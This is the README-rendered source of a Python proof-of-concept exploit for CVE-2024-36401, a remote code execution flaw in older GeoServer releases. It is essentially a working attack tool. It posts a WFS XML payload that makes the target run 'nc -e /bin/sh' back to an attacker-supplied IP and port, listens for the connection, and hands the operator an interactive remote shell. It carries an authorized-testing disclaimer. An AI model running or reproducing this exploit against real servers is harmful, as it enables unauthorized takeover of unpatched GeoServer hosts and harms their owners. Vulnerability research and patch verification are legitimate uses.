README.md
Rendering markdown...
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
Author: x.com/MohamedNab1l
GitHub: https://github.com/bigb0x/CVE-2024-36401
About:
POC for CVE-2024-36401: RCE for GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer. This POC is based on the security advisory by phith0n: https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401
Note:
This POC will attempt to establish a reverse shell from the vlun targets. This is aimed to work against Linux targets. You will have to have a machine with published and accessiable IP in order to run this poc. This technique assumes that nc is available at the remote target.
Usage:
python CVE-2024-36401.py -u HTTP://TARGET:9090 -ip YOUR-IP -port LOCAL-PORT-NUMBER -type GeoServer-Object-Type
Please feel free to contact me if you have any comments or sugesstions
Version: 1.0.3
Refrences
https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401
Disclaimer:
I like to create my own tools for fun, work and educational purposes only. I do not support or encourage hacking or unauthorized access to any system or network. Please use my tools responsibly and only on systems where you have clear permission to test.
"""
import requests
import argparse
import re
import os
import threading
import time
import socket
from urllib.parse import urlparse
import select
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# ANSI color codes
light_gray_color = '\033[37;1m'
dimmed_gray_color = '\033[90m'
honey_yellow_color = '\033[38;5;214m'
dim_yellow_color = "\033[33;1m"
cyan_color = '\033[96m'
green_color = '\033[92m'
red_color = '\033[31m'
reset_color = '\033[0m'
LOG_DIR = "logs"
# THE_VERSION ="1.0.3"
def banner():
print(f'''{honey_yellow_color}
┏┓┓┏┏┓ ┏┓┏┓┏┓┏┓ ┏┓┏┓┏┓┏┓┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┣┓┃┃┃┫┃
┗┛┗┛┗┛ ┗━┗┛┗━┗╋ ┗┛┗┛┗╋┗┛┻
-> {light_gray_color}POC for CVE-2024-36401. Will try to obtain a shell on linux targets.{reset_color}
{honey_yellow_color}-> {light_gray_color}By: x.com/mohamednab1l
{honey_yellow_color}-> {honey_yellow_color}Use this wisely.{reset_color}
''')
def print_message(level, message):
current_time = time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime())
if level == 'info':
print(f"{current_time} {green_color}[INFO]{reset_color} {message}")
elif level == 'warning':
print(f"{current_time} {honey_yellow_color}[VLUN] {message} {reset_color}")
elif level == 'error':
print(f"{current_time} {red_color}[ERROR]{message}{reset_color} ")
def create_log_dir():
if not os.path.exists(LOG_DIR):
os.makedirs(LOG_DIR)
print_message('info', f"Log directory created: {LOG_DIR}")
def clean_host(url):
parsed_url = urlparse(url)
host = parsed_url.netloc or parsed_url.path
host = re.sub(r'^www\.', '', host)
host = re.sub(r'/$', '', host)
return host
def send_poc_request(url, host, ip, port, type):
full_url = f"{url}/geoserver/wfs"
headers = {
"Host": host,
"Accept-Encoding": "gzip, deflate, br",
"Accept": "*/*",
"Accept-Language": "en-US;q=0.9,en;q=0.8",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36",
"Connection": "close",
"Cache-Control": "max-age=0",
"Content-Type": "application/xml",
}
custom_payload = f"""
<wfs:GetPropertyValue service='WFS' version='2.0.0'
xmlns:topp='http://www.openplans.org/topp'
xmlns:fes='http://www.opengis.net/fes/2.0'
xmlns:wfs='http://www.opengis.net/wfs/2.0'>
<wfs:Query typeNames='{type}'/>
<wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'nc -e /bin/sh {ip} {port}')</wfs:valueReference>
</wfs:GetPropertyValue>
"""
try:
response = requests.post(full_url, headers=headers, data=custom_payload, timeout=30, verify=False)
print_message('info', f"Response status code: {dim_yellow_color}{response.status_code}{reset_color}")
if response.status_code in [401, 404, 403]:
print_message('info', "Target is not vulnerable.")
exit()
else:
print_message('info', "Request sent. Checking for incoming connections.")
except requests.exceptions.RequestException as e:
print_message('error', f"An error occurred: {e}")
print_message('error', "Failed to send request!")
def receive_output(client_socket, timeout=5):
total_data = []
client_socket.setblocking(0)
start_time = time.time()
while True:
if total_data and time.time() - start_time > timeout:
break
elif time.time() - start_time > timeout * 2:
break
try:
data = client_socket.recv(8192)
if data:
total_data.append(data.decode('utf-8', errors='ignore'))
start_time = time.time()
else:
time.sleep(0.1)
except socket.error:
pass
return ''.join(total_data).strip()
def interactive_shell(client_socket):
print_message('warning', "Nice!, we got a remote shell! :)")
client_socket.send(b"id\n")
time.sleep(1)
output = receive_output(client_socket)
if output:
print_message('warning', "Checking the output of 'id' command:")
print(f"{output}")
else:
print("No output received from 'id' command.")
print_message('warning', "Shell established!.")
print_message('warning', "Type commands and press enter to send, or type 'exit' to end the session.")
while True:
try:
command = input(f"{honey_yellow_color}shell> {reset_color}")
if command.lower() == 'exit':
break
client_socket.send(command.encode() + b'\n')
time.sleep(1)
output = receive_output(client_socket)
if output:
print(output)
else:
print_message('warning', "No output received.")
except Exception as e:
print_message('error', f"Error in shell: {e}")
break
client_socket.close()
print_message('info', "Shell connection closed.")
exit()
def listen(ip, port, stop_event):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((ip, port))
s.settimeout(1)
s.listen(1)
print_message('info', f"Listening on {ip}:{port}...")
try:
while not stop_event.is_set():
try:
client, (client_ip, client_port) = s.accept()
print_message('info', f"Received connection from: {client_ip}:{client_port}")
print_message('warning', "POC was successful!")
interactive_shell(client)
except socket.timeout:
continue
except Exception as e:
print_message('error', f"An error occurred: {e}")
finally:
s.close()
def main():
banner()
parser = argparse.ArgumentParser(description='POC for CVE-2024-36401')
parser.add_argument('-u', required=True, help='Target, example https://target:8080')
parser.add_argument('-ip', required=True, help='Your IP, example 192.168.1.1')
parser.add_argument('-port', required=True, help='Port, example 1337')
parser.add_argument('-type', required=True, help='Type, example sf:archsites')
args = parser.parse_args()
url = args.u
ip = args.ip
port = int(args.port)
type = args.type
host = clean_host(url)
stop_event = threading.Event()
def listen_wrapper():
listen(ip, port, stop_event)
listen_thread = threading.Thread(target=listen_wrapper)
listen_thread.daemon = True
listen_thread.start()
time.sleep(1)
try:
# Send the POST request
send_poc_request(url, host, ip, port, type)
while listen_thread.is_alive():
listen_thread.join(1)
except KeyboardInterrupt:
print_message('info', "Keyboard interrupt received. Cleaning up...")
finally:
stop_event.set()
# (should be quick now)
listen_thread.join(timeout=5)
if listen_thread.is_alive():
print_message('warning', "Listen thread did not stop in time. It will be terminated.")
print_message('info', "Script execution completed. Exiting...")
if __name__ == "__main__":
create_log_dir()
main()